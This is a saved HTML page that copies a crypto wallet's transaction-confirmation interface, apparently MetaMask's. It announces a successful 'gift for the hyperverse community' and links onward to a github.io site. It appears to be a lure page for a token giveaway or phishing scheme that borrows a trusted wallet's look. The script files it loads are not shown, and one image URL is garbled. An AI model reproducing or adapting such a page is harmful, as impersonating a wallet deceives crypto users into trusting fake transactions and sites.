<!DOCTYPE html>
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
   
    
    <title>H5-thehyperverse</title>
    <style>
      #app-content {
        display: flex;
        flex-flow: column;
      }

      #loading__logo {
        width: 10rem;
        height: 10rem;
        align-self: center;
        margin: 10rem 0 0 0;
      }

      #loading__spinner {
        width: 2rem;
        height: 2rem;
        align-self: center;
        margin-top: 1rem;
      }
    </style>
    <link rel="shortcut icon" href="https://s2.coinmarketcap.com/static/img/coins/200x200/17654.png">
    <link rel="stylesheet" type="text/css" href="./home_files/index10.css" title="ltr">
    <link rel="stylesheet" type="text/css" href="./home_files/index-rtl.css" title="rtl" disabled="">
  <style></style></head>
  <body class="notification">
    <div id="app-content"><div class="app"><div><span></span></div><div class="menu-droppo-container network-droppo" style="position: absolute; top: 58px; width: 309px; z-index: 55;"><style>
          .menu-droppo-enter {
            transition: transform 300ms ease-in-out;
            transform: translateY(-200%);
          }

          .menu-droppo-enter.menu-droppo-enter-active {
            transition: transform 300ms ease-in-out;
            transform: translateY(0%);
          }

          .menu-droppo-leave {
            transition: transform 300ms ease-in-out;
            transform: translateY(0%);
          }

          .menu-droppo-leave.menu-droppo-leave-active {
            transition: transform 300ms ease-in-out;
            transform: translateY(-200%);
          }
        </style></div><div class="main-container-wrapper"><div class="page-container"><div class="confirm-page-container-navigation" style="display: none;"><div class="confirm-page-container-navigation__container" style="visibility: hidden;"><div class="" ><img src="htthttps://s2.coinmarketcap.com/static/img/coins/200x200/17654.pngps://s2.coinmarketcap.com/static/img/coins/200x200/17654.png" alt=""></div><div class="confirm-page-container-navigation__arrow" data-testid="previous-page"><img src="./home_files/single-arrow.svg" alt=""></div></div><div class="confirm-page-container-navigation__textcontainer"></div><div class="confirm-page-container-navigation__container" style="visibility: hidden;"><div class="confirm-page-container-navigation__arrow" data-testid="next-page"><img class="confirm-page-container-navigation__imageflip" src="https://s2.coinmarketcap.com/static/img/coins/200x200/17654.png" alt=""></div><div class="confirm-page-container-navigation__arrow" data-testid="last-page"><img class="confirm-page-container-navigation__imageflip" src="./home_files/double-arrow.svg" alt=""></div></div></div><div class="confirm-approve-content"><div class="confirm-approve-content__identicon-wrapper"><img class="identicon confirm-approve-content__identicon" src="https://s2.coinmarketcap.com/static/img/coins/200x200/17654.png" alt="" style="height: 108px; width: 108px; border-radius: 90px;"></div><div class="confirm-approve-content__title">
		
		SUCCESSFUL..!</div><div class="confirm-approve-content__description"></div><div class="confirm-approve-content__card-wrapper"><div class="confirm-approve-content__card--no-border"><div class="confirm-approve-content__card-header"><div class="confirm-approve-content__card-header__title"></div><div class="confirm-approve-content__small-blue-text cursor-pointer"></div></div><div class="confirm-approve-content__card-content"><div class="confirm-approve-content__transaction-details-content"><div class="confirm-approve-content__small-text">
</div>	
		</div><div class="confirm-approve-content__title">H5-thehyperverse</div><div class="confirm-approve-content__description">A gift for the hyperverse community.
Successfully sent..


<div class="confirm-approve-content__description">have a good time...</b><br></div></div><div class="confirm-approve-content__view-full-tx-button-wrapper"><div class="confirm-approve-content__view-full-tx-button cursor-pointer"></div></div></div></div></div><div class="page-container__footer"><footer><a type="submit" class="button btn-primary page-container__footer-button" data-testid="page-container-footer-next" role="button" tabindex="0" data-v-33c708fa="" href="https://the-h5hyperverse.github.io/h5/">OK</a></footer></div></div></div></div></div>
    <div id="popover-content"></div>
    <script src="./home_files/globalthis.js.download" type="text/javascript" charset="utf-8"></script>
    <script src="./home_files/initSentry.js.download" type="text/javascript" charset="utf-8"></script>
    <script src="./home_files/lockdown.js.download" type="text/javascript" charset="utf-8"></script>
    <script src="./home_files/runLockdown.js.download" type="text/javascript" charset="utf-8"></script>
    <script src="./home_files/ui-libs.js.download" type="text/javascript" charset="utf-8"></script>
    <script src="./home_files/ui.js.download" type="text/javascript" charset="utf-8"></script>
  

</body></html>
